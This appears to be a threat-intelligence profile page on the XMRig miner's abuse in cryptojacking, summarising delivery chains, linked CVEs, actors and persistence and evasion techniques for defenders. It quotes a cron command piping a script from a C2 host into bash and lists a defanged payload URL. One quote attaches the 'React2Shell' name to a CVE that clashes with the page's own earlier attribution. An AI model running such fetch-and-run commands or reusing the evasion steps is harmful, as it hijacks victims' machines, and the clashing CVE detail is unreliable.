XMRig is a widely used open-source Monero cryptocurrency miner that is frequently repurposed by threat actors for illicit cryptomining and resource hijacking. Although legitimate in benign administrative or enthusiast contexts, it commonly appears as the final payload in cryptojacking operations across Windows and Linux environments, where attackers deploy it after gaining access through social engineering, software supply-chain compromise, exploitation of internet-facing services, SQL injection, SSH brute-force or credential abuse, and malware download chains.
In malicious use, XMRig is typically installed and configured to mine Monero on compromised hosts while minimizing detection. Operators often pair it with persistence mechanisms such as scheduled tasks, Windows services, systemd services, cron jobs, watchdog components, hidden copies, and process masquerading. Campaigns have also used Microsoft Defender exclusions, hidden file attributes, renamed binaries, and wrapper tools to disguise miner execution as legitimate system processes. Some actor-modified variants add persistence and recovery logic beyond stock XMRig behavior.
XMRig is commonly delivered by loaders, downloaders, botnets, and backdoors rather than serving as the initial intrusion tool itself. Observed delivery chains include ClickFix-style PowerShell lures targeting gamers, trojanized RubyGems packages targeting developers, fake cracked-software malvertising campaigns, Linux propagation malware spreading over SSH, exploitation of vulnerable GitLab and TeamCity servers, compromise of cloud-hosted instances, and post-exploitation activity following web application compromise. It has also been deployed alongside other malware families such as Vidar, AsyncRAT, Quasar, Remcos-style payloads, Phorpiex components, ShellBot, MIG LogCleaner, XHide, and custom developer-targeting backdoors.
Threat actors associated with XMRig deployment in observed operations include financially motivated intrusion sets, botnet operators, supply-chain attackers, and some state-linked or state-aligned clusters using cryptomining as a secondary monetization or opportunistic payload. Reported associations include Sysrv Botnet activity, Rare Werewolf operations in some cases, and broader intrusion clusters that stage XMRig together with tunneling, proxying, or post-exploitation tooling. Victimology spans consumers, small and medium-sized businesses, software developers, shared hosting providers, cloud workloads, enterprise servers, and public-sector organizations.
Because XMRig is legitimate software, attribution should focus on the surrounding intrusion chain, persistence, evasion, and unauthorized execution context rather than the miner alone. In malicious campaigns, its primary impact is unauthorized consumption of CPU and system resources, though its presence often indicates a broader compromise that may also involve credential theft, lateral movement, backdoor access, or additional payload deployment.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
28 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Анатомия cPanel уязвимости CVE-2026-41940: как CRLF-инъекция даёт root на WHM CVE-2026-41940 - обход аутентификации (CWE-306, Missing Authentication for Critical Function), активно эксплуатируемая в дикой среде (CISA KEV), CVSS 9.3 по шкале 4.0. Затрагивает все версии cPanel/WHM начиная с 11.40, включая DNSOnly и WP Squared. | Криптоджекинг (T1496, Resource Hijacking). Развёртывание XMRig - самый частый сценарий.
Криптоджекинг (T1496, Resource Hijacking). Развёртывание XMRig - самый частый сценарий.
CVE-2021-22205 is a critical remote code execution vulnerability in the service’s web interface... GitLab amended the CVSSv3 score to 10.0... shifting the vulnerability from an authenticated to an unauthenticated condition... The entry point for this vulnerability is the POST request via /uploads/user endpoint.
APT29 (Cozy Bear) exploited CVE-2024-27198 in real-world campaigns.
In this case, the attacker was automatically trying to exploit CVE-2024-4577, which affects certain versions of PHP 8 when using Apache and PHP-CGI on Windows.
Threat actors are continuing to exploit a critical Langflow vulnerability as part of fresh attacks designed to deliver a Monero cryptocurrency miner. The activity has been found to weaponize CVE-2026-33017 (CVSS score: 9.3), an unauthenticated remote code execution (RCE) vulnerability in Langflow, indicating threat actors are scanning and targeting exposed artificial intelligence (AI) application endpoints for obtaining initial access to enterprise networks.
The React2Shell vulnerability (CVE-2025–55182) was reported to the React team on November 29. Public advisories and patches dropped on December 3. Threat actors started exploiting it within hours... React2Shell (CVE-2025–55182) is a critical, unauthenticated remote code execution bug in React Server Components’ “Flight” protocol. | Common post-exploitation moves: Install XMRig or another cryptominer
Along with patching, we recommend examining SAP web server access logs for additional evidence of CVE-2025-31324 exploitation, specifically looking for evidence of unusual requests to the API endpoint /developmentserver/metadatauploader . If possible, consider disallowing access to that API endpoint from external networks. To hunt for additional evidence of web shell uploads, organizations can search for unexpected JSP files within these folders on SAP servers... | hxxp[://]23.95.123[.]5:666/xmrigCCall/8bq.sh
This service is accompanied by a pipe named \\.\WinRing0_1_2_0 which allows the process to communicate with the driver. This is quite an old driver, vulnerable to CVE-2020-14979 and CVE-2021-41285, and allowing the actor to elevate privileges to NT\SYSTEM as soon as the direct unchecked communication with the driver is allowed and the attacker controls input forwarded to the driver.
This service is accompanied by a pipe named \\.\WinRing0_1_2_0 which allows the process to communicate with the driver. This is quite an old driver, vulnerable to CVE-2020-14979 and CVE-2021-41285, and allowing the actor to elevate privileges to NT\SYSTEM as soon as the direct unchecked communication with the driver is allowed and the attacker controls input forwarded to the driver.
Ahnlab Security Emergency response Center (ASEC) has recently confirmed that the 8220 Gang attack group is using the Log4Shell vulnerability to install CoinMiner in VMware Horizon servers. Log4Shell (CVE-2021-44228) is both a remote code execution vulnerability and the Java-based logging utility Log4j vulnerability... | If the CVE-2022-26134 vulnerability attack succeeds, the following PowerShell command downloads and executes additional PowerShell scripts and ultimately installs XMRig CoinMiner.
The group targets not only global systems but also Korean ones. ASEC has introduced a case where the attack group abused the Atlassian Confluence server vulnerability CVE-2022-26134 to attack Korean systems and install CoinMiner. | If the CVE-2022-26134 vulnerability attack succeeds, the following PowerShell command downloads and executes additional PowerShell scripts and ultimately installs XMRig CoinMiner.
In this cluster of activity, since at least March 25, 2026, an XMRig sample and its accompanying configuration file were downloaded and deployed via a shell script.
In this cluster of activity, since at least March 25, 2026, an XMRig sample and its accompanying configuration file were downloaded and deployed via a shell script.
In this cluster of activity, since at least March 25, 2026, an XMRig sample and its accompanying configuration file were downloaded and deployed via a shell script.
Several devices initiated TCP connections to endpoints affiliated with cryptomining pools such as us[.]zephyr[.]herominers[.]com and xmrig[.]com. Connectivity to these domains indicates likely successful installation of mining software during earlier stages of post-compromise activity.
Several devices initiated TCP connections to endpoints affiliated with cryptomining pools such as us[.]zephyr[.]herominers[.]com and xmrig[.]com. Connectivity to these domains indicates likely successful installation of mining software during earlier stages of post-compromise activity.
CVE-2022-22954, a remote code execution (RCE) vulnerability due to server-side template injection in VMware Workspace ONE Access and Identity Manager, is trivial to exploit with a single HTTP request to a vulnerable device.
Apache RocketMQ Exploit Module (CVE-2023-33246) ... In June 2023, a vulnerability cataloged as CVE-2023-33246 was discovered that enables an attacker to achieve remote command execution (RCE) on RocketMQ versions 5.1.0 and earlier. Shortly after, DreamBus added an exploit module to target this vulnerability.
Metabase Exploit Module (CVE-2023-38646) ... The open source versions of Metabase 0.46.6.1 and earlier, as well as Metabase Enterprise 1.46.6.1 and earlier, are vulnerable to CVE-2023-38646 ... The vulnerability allows an attacker to execute arbitrary commands on the server. The DreamBus exploit targeting the vulnerability is likely based on an open source proof-of-concept.
The attack, at its core, exploits a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances and hijack their computing power for illicit cryptocurrency mining using XMRig.
CVE-2026-20182 carries a CVSSv3.1 score of 10.0 (Critical) and is classified under CWE-287: Improper Authentication. The flaw affects the Cisco Catalyst SD-WAN Controller (formerly vSmart)... The peering authentication mechanism is not functioning correctly, allowing an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on the affected system.
Apr 2024 PAN-OS CVE-2024-3400 exploit integration (Akamai)
Analysis of react.py This script is clearly set to exploit CVE-2025-29927, also known as React2Shell. ... This script implements a fully automated React/Next.js exploitation pipeline centered on abusing CVE-2025-29927 to achieve remote command execution at scale.
Malware campaigns include the Muhstik botnet and XMRig Monero Cryptocurrency mining. | Drupal versions before 7.58... allow remote attackers to execute arbitrary code... Malware campaigns include the Muhstik botnet and XMRig Monero Cryptocurrency mining.
The PoC repository contained a PDF file... downloading and running three files: Xsession.sh → The main malware script; xsession.auth → A disguised Monero miner (XMRig); xprintidle → A utility to detect when the system was idle. | Late at night, I was testing a proof-of-concept (PoC) exploit for CVE-2020-35489 ... The script appears to be a simple Proof-of-Concept (PoC) for an exploit, but in reality, it contains hidden malicious functionality.
“CoinMiner XMRig, a CoinMiner that mines the Monero cryptocurrency, was the one the most used in the attacks.”
"x522, which kills competing miners such as XMRig and Kinsing, and launches the miner with a c3pool.org configuration"
27 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The packages copied legitimate Ruby libraries and altered their entry-point files to launch mining code... Download URL raw.githubusercontent.com/xmrig/xmrig/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz Miner archive download location
The packages copied legitimate Ruby libraries and altered their entry-point files to launch mining code... Download URL raw.githubusercontent.com/xmrig/xmrig/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz Miner archive download location
Impact: Resource hijacking (XMRig cryptomining) and potential data encryption for impact(ransomware/extortion claims).
Криптоджекинг (T1496, Resource Hijacking). Развёртывание XMRig - самый частый сценарий.
31 distinct techniques documented for this family, organized by ATT&CK tactic.
CVE-2021-22205 is a critical remote code execution vulnerability in the service’s web interface... The entry point for this vulnerability is the POST request via /uploads/user endpoint.
Crontab-записи с периодичностью 1-5 минут: curl -s http://[C2]/xmr.sh | bash - удалишь майнер, cron его вернёт
So it launches every time Windows starts, it will create a new scheduled task named "XMRig-[computer name]," that launches the system.exe executable with SYSTEM privileges.
Its gems included a hidden Ruby file that downloaded the mining program when the package was loaded, then launched it directly.
The threat actors reply to posts, telling other members to open PowerShell as an administrator and run a command to fix the issue.
Crontab-записи с периодичностью 1-5 минут: curl -s http://[C2]/xmr.sh | bash - удалишь майнер, cron его вернёт
So it launches every time Windows starts, it will create a new scheduled task named "XMRig-[computer name]," that launches the system.exe executable with SYSTEM privileges.
They then created persistence for the cryptocurrency miner using nssm.exe
Crontab-записи с периодичностью 1-5 минут: curl -s http://[C2]/xmr.sh | bash - удалишь майнер, cron его вернёт
So it launches every time Windows starts, it will create a new scheduled task named "XMRig-[computer name]," that launches the system.exe executable with SYSTEM privileges.
They then created persistence for the cryptocurrency miner using nssm.exe
Both the DLL name and function name are XOR-obfuscated with single-byte key 0x05 to evade static string scanning.
The PowerShell script distributed in the Steam campaign masquerades as a Windows optimization utility named "msf utility \ PC Opt."
It also attempts to stop an existing scheduled task named 'XMRig-[computer name]' and terminates matching processes named 'xmrig' or 'system' that are running from the installation directory. It also attempts to delete any XMRig configuration files stored as C:\Windows\Background\config.json.
The maps table shows the binary that initiated the process, then it has been deleted... the malware often self-deleted itself.
Since the victim manually launches the command, the attack can also bypass some security protections that would otherwise automatically block executed malicious code.
Each package carried the same mining payload, but it waited five hours before running. That delay is designed to avoid quick checks in automated sandboxes... The malware also checks whether it is running inside common virtual machines, containers, or debugging environments.
The malware employs anti-analysis techniques such as process enumeration, alongside an AMSI bypass...
Geolocation beacon : GET request to ip-api[.]com/json resolves the victim's public IP address and country, which are embedded in the subsequent Telegram alert
Each package carried the same mining payload, but it waited five hours before running. That delay is designed to avoid quick checks in automated sandboxes... The malware also checks whether it is running inside common virtual machines, containers, or debugging environments.
517 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A cryptocurrency miner payload installed via a ClickFix-style PowerShell social engineering attack. The script downloads the XMRig executable, stores it as C:\Windows\Background\system.exe, adds Defender exclusions, creates a firewall rule, and establishes persistence through a scheduled task named "XMRig-[computer name]" running with SYSTEM privileges.
A Monero cryptomining payload delivered via trojanized RubyGems packages. It is used to consume infected developer machines’ CPU resources for covert cryptocurrency mining, with some packages delaying execution and using anti-analysis checks to evade detection.
A cryptocurrency mining tool/proxy component found staged on operator infrastructure, suggesting possible secondary or idle-phase use, but not central to the campaign’s primary intrusion activity.
Monero mining malware/tool used as a delivered payload in the campaign.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.